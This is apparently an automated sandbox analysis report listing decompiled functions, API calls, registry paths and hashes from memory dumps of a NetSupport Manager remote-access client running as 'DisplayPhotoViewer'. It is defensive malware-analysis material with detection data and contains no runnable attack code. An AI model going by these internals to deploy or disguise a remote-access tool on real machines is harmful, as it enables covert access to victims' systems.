                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$HeapVirtual$Destroy
                                                                                                    • String ID:
                                                                                                    • API String ID: 716807051-0
                                                                                                    • Opcode ID: e982bcdad80726918e2b34c931088d70cb88babe8152c1b18760d56d7f467aef
                                                                                                    • Instruction ID: 63104b8d68fb288420de1122586ad6dbf969489095f6ba07cc200215d45010fd
                                                                                                    • Opcode Fuzzy Hash: e982bcdad80726918e2b34c931088d70cb88babe8152c1b18760d56d7f467aef
                                                                                                    • Instruction Fuzzy Hash: 4D113C35680225EBD7229F14DC85F06B7A5FB4D750F328158F640671A8C6B2AC069F58
                                                                                                    Function 11083470 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 134COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11083B10: _memset.LIBCMT ref: 11083B2F
                                                                                                      • Part of subcall function 11083B10: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106C2D3,00000000,00000000,1117757E,000000FF), ref: 11083BA0
                                                                                                    • _memset.LIBCMT ref: 11083512
                                                                                                    • _free.LIBCMT ref: 110835C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset$CriticalInitializeSection_free
                                                                                                    • String ID: ..\CTL32\EncryptFuncs.cpp$1 + (int) strlen(pszEnc64) < maxlen$pDES
                                                                                                    • API String ID: 1034327355-3728095610
                                                                                                    • Opcode ID: ee79224c9f9f2d50c736650042d09290cd17f7cd8ff6f16355ae4f183240f354
                                                                                                    • Instruction ID: 6075f93dac07e3b9ff52bbbf3461db84779f0e8cee520564eb9c04fa52d763a4
                                                                                                    • Opcode Fuzzy Hash: ee79224c9f9f2d50c736650042d09290cd17f7cd8ff6f16355ae4f183240f354
                                                                                                    • Instruction Fuzzy Hash: 7A41E875E042599BDB14DF24CC81FEEB7B4FB84714F408594E955AB280EF30BA458BE0
                                                                                                    Function 11133750 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • KillTimer.USER32(00000000,00000000,00000000,1102BF72,TermUI...), ref: 1113382A
                                                                                                    • KillTimer.USER32(00000000,00007F2D,00000000,1102BF72,TermUI...), ref: 11133847
                                                                                                    • FreeLibrary.KERNEL32(75B40000,?,00000000,1102BF72,TermUI...), ref: 111338BD
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,1102BF72,TermUI...), ref: 111338D9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeKillLibraryTimer
                                                                                                    • String ID: TermUI
                                                                                                    • API String ID: 2006562601-4085834059
                                                                                                    • Opcode ID: a42b0379d892b21400b9a6640724abd10ec8f0b26e7538fd00b08548e9dc3a1f
                                                                                                    • Instruction ID: 3e8b4f24f8d7cf2f96131d2e66af77bc80e8e610ebfdef7ce392803a22a66c50
                                                                                                    • Opcode Fuzzy Hash: a42b0379d892b21400b9a6640724abd10ec8f0b26e7538fd00b08548e9dc3a1f
                                                                                                    • Instruction Fuzzy Hash: 6341A1B5A666309FD202DFD5D9C4A6EFBA9FB89B1CB104269F421C3B48D730A401CF95
                                                                                                    Function 10705E1F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersionExA.KERNEL32 ref: 10705E3E
                                                                                                    • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 10705E73
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10705ED3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                    • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                    • API String ID: 1385375860-4131005785
                                                                                                    • Opcode ID: 6d8b23cefda49418071d09c37c7237526d23dabc7d11ca24aaaa773f5bd9bb75
                                                                                                    • Instruction ID: 44fadfe32f3a263012582d278c29a17ea5ff03423a091c7cfce0352a606037b6
                                                                                                    • Opcode Fuzzy Hash: 6d8b23cefda49418071d09c37c7237526d23dabc7d11ca24aaaa773f5bd9bb75
                                                                                                    • Instruction Fuzzy Hash: 38311875901299AEEB228670AC95BCF37E8DB07380F1402D5E185DE049E634BFC9CB11
                                                                                                    Function 11055990 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,00020019,00000000,?,?), ref: 11055A10
                                                                                                    • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,00000000,?,?,?,?,?,?), ref: 11055A6F
                                                                                                    • RegEnumValueA.ADVAPI32(00000000,00000001,?,?,00000000,?,?,?,?,?), ref: 11055AE1
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 11055AEE
                                                                                                    Strings
                                                                                                    • SOFTWARE\Productive Computer Insight\Client32\AutoReconnect, xrefs: 110559C9, 11055A04
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnumValue$CloseOpen
                                                                                                    • String ID: SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                                                                    • API String ID: 3785232357-4133889954
                                                                                                    • Opcode ID: a215f1bed0227b9061d558d6eb7b4b90d51f6f3bd0c8e022dda0509cfc66014b
                                                                                                    • Instruction ID: 17682a4840668cd6e4519ac14c881411bd496a39583594207744b313f48c7cb6
                                                                                                    • Opcode Fuzzy Hash: a215f1bed0227b9061d558d6eb7b4b90d51f6f3bd0c8e022dda0509cfc66014b
                                                                                                    • Instruction Fuzzy Hash: 8A415672E112299FEB55CF54CC91FEAB3B8AB49704F4041E9E60DE7180EA715A44CF61
                                                                                                    Function 1113B9F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID: %s: $DISPLAYPHOTOVIEWER
                                                                                                    • API String ID: 4139908857-1826084258
                                                                                                    • Opcode ID: 75b4f354d761b22b05d3727a3963c4de94f987d3ee6b41d65b23fcfba9aa57bd
                                                                                                    • Instruction ID: 15e2053daecc66cd620e45fb8f2b5ea00e478d70cc9849b26e907824ef66b7bb
                                                                                                    • Opcode Fuzzy Hash: 75b4f354d761b22b05d3727a3963c4de94f987d3ee6b41d65b23fcfba9aa57bd
                                                                                                    • Instruction Fuzzy Hash: 3541183490155A9BCB11CFA8DC58BFAFBA4FF8531AF0082A5D81597248EB309649CF84
                                                                                                    Function 110D79E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • std::exception::exception.LIBCMT ref: 110D7AD4
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110D7AE9
                                                                                                      • Part of subcall function 11009170: std::_Xinvalid_argument.LIBCPMT ref: 110091E5
                                                                                                      • Part of subcall function 11009170: _memmove.LIBCMT ref: 11009236
                                                                                                    Strings
                                                                                                    • Invalid Passcode, xrefs: 110D7A65
                                                                                                    • Your system/device requires approval by the service before you can access it fully, xrefs: 110D7AA7
                                                                                                    • The version of the software you are running is not supported by the service, xrefs: 110D7A86
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8ThrowXinvalid_argument_malloc_memmove_memsetstd::_std::exception::exceptionwsprintf
                                                                                                    • String ID: Invalid Passcode$The version of the software you are running is not supported by the service$Your system/device requires approval by the service before you can access it fully
                                                                                                    • API String ID: 390219819-299493402
                                                                                                    • Opcode ID: a55439e3ab79e5897cdd568946cb6677d5bfa9ddee7e2a6ea06021f0c6593b1d
                                                                                                    • Instruction ID: edeb43edfc7dbdf1b46ad59295ab5e9cb7c333a6879943ce7133d4d149fdccfb
                                                                                                    • Opcode Fuzzy Hash: a55439e3ab79e5897cdd568946cb6677d5bfa9ddee7e2a6ea06021f0c6593b1d
                                                                                                    • Instruction Fuzzy Hash: 244162B5A0470AAFDB00CF95C844BDAFBF8FB58314F10465EE51997680EB74AA04CBA1
                                                                                                    Function 1103F080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 90libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(pcihooks.dll), ref: 1103F146
                                                                                                    • GetProcAddress.KERNEL32(00000000,Monitor), ref: 1103F15B
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1103F173
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Monitor$pcihooks.dll
                                                                                                    • API String ID: 145871493-549663706
                                                                                                    • Opcode ID: 093e91ea3ca7f1def94de2ed1c0f325e58571dd87db5dff8c62930ec2a556a57
                                                                                                    • Instruction ID: d3856a6d142c8d79d849abc4956bcb9cb73575ea9b986ccaadf67eb30c7dedbd
                                                                                                    • Opcode Fuzzy Hash: 093e91ea3ca7f1def94de2ed1c0f325e58571dd87db5dff8c62930ec2a556a57
                                                                                                    • Instruction Fuzzy Hash: 8331C274E00659EFCB15DFA4D880BAEBBF9FF49304F00825DE81593294EB34AA41CB91
                                                                                                    Function 110319D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strncpy$wsprintf
                                                                                                    • String ID: %s (%s)
                                                                                                    • API String ID: 2895084632-1363028141
                                                                                                    • Opcode ID: c2c3b66c73fafed31db78f2435bf9bf84fb5b9a23884d068094f50acaf10809c
                                                                                                    • Instruction ID: acd263fff2a6e0b3c162b1e8cc8d923715b6e880cb15e02d2131be6b7f5fb9c2
                                                                                                    • Opcode Fuzzy Hash: c2c3b66c73fafed31db78f2435bf9bf84fb5b9a23884d068094f50acaf10809c
                                                                                                    • Instruction Fuzzy Hash: EF31DF76A00B02AFC350DF65C980AA3B7E9FF89358B40491DE94A87E00E731F456CBA1
                                                                                                    Function 110734D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 11073509
                                                                                                    • SetRect.USER32(?,00000001,00000001,0000000C,0000000C), ref: 11073535
                                                                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 110735A9
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Rect$ExitProcess$ClientErrorInvalidateLastMessage_strrchrwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2435669796-1557312927
                                                                                                    • Opcode ID: 7c0718ed2863bea0efd09e84297aa100aab8c2802427eb35c5828cd842dee2d0
                                                                                                    • Instruction ID: f223430b13d80b1fe6c9bb097dbf9c0922efbcd5502a01a5398dbd2d0fe0ac9a
                                                                                                    • Opcode Fuzzy Hash: 7c0718ed2863bea0efd09e84297aa100aab8c2802427eb35c5828cd842dee2d0
                                                                                                    • Instruction Fuzzy Hash: C821D875A0021AEFD710DF54CC81FEFF3A9EB88304F10C219F945AB280E770AA458B91
                                                                                                    Function 1113B580 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 1113B5F0
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1113B654
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                    • API String ID: 47109696-3245241687
                                                                                                    • Opcode ID: d560cc61fc2140d18da63f4b3bf0ea2305538077f776507ffaf68adc1f38225d
                                                                                                    • Instruction ID: 9220f0a519618d912ae8205e62b5c3bfe3d4f9f01e79e904e9a989c8c0a7d550
                                                                                                    • Opcode Fuzzy Hash: d560cc61fc2140d18da63f4b3bf0ea2305538077f776507ffaf68adc1f38225d
                                                                                                    • Instruction Fuzzy Hash: DC21FD75D1021A9BE721DA54CC80F9EF779BB84324F0041AAD81DF3284F631DD458BA5
                                                                                                    Function 11139480 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 111394BB
                                                                                                    • _strrchr.LIBCMT ref: 111394CA
                                                                                                    • _strrchr.LIBCMT ref: 111394DA
                                                                                                    • wsprintfA.USER32 ref: 111394F5
                                                                                                      • Part of subcall function 1113B8F0: GetModuleHandleA.KERNEL32(NSMTRACE,11189A50), ref: 1113B90A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
